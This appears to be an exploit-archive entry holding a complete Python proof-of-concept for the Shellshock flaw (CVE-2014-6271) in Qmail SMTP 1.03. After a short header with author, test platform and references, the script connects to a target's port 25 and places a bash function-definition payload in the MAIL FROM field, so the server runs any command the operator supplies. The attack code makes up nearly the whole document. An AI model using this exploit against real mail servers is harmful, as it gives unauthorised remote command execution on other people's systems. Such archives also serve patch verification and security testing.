Qmail SMTP 1.03 - Bash Environment Variable Injection

2020-10-06
ID: 103363
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 2020-07-03
# Exploit Author: 1F98D
# Original Authors: Mario Ledo, Mario Ledo, Gabriel Follon
# Version: Qmail 1.03
# Tested on: Debian 9.11 (x64)
# CVE: CVE-2014-6271
# References:
# http://seclists.org/oss-sec/2014/q3/649
# https://lists.gt.net/qmail/users/138578
#
# Qmail is vulnerable to a Shellshock vulnerability due to lack of validation
# in the MAIL FROM field.
#
#!/usr/local/bin/python3

from socket import *
import sys

if len(sys.argv) != 4:
    print('Usage {} <target ip> <email adress> <command>'.format(sys.argv[0]))
    print("E.g. {} 127.0.0.1 '[email protected]' 'touch /tmp/x'".format(sys.argv[0]))
    sys.exit(1)

TARGET = sys.argv[1]
MAILTO = sys.argv[2]
CMD = sys.argv[3]

s = socket(AF_INET, SOCK_STREAM)
s.connect((TARGET, 25))

res = s.recv(1024)
if 'ESMTP' not in str(res):
    print('[!] No ESMTP detected')
    print('[!] Received {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] ESMTP detected')
s.send(b'HELO x\r\n')
res = s.recv(1024)
if '250' not in str(res):
    print('[!] Error connecting, expected 250')
    print('[!] Received: {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] Connected, sending payload')
s.send(bytes("MAIL FROM:<() {{ :; }}; {}>\r\n".format(CMD), 'utf-8'))
res = s.recv(1024)
if '250' not in str(res):
    print('[!] Error sending payload, expected 250')
    print('[!] Received: {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] Payload sent')
s.send(bytes('RCPT TO:<{}>\r\n'.format(MAILTO), 'utf-8'))
s.recv(1024)
s.send(b'DATA\r\n')
s.recv(1024)
s.send(b'\r\nxxx\r\n.\r\n')
s.recv(1024)
s.send(b'QUIT\r\n')
s.recv(1024)
print('[*] Done')
1-4-2 (www02)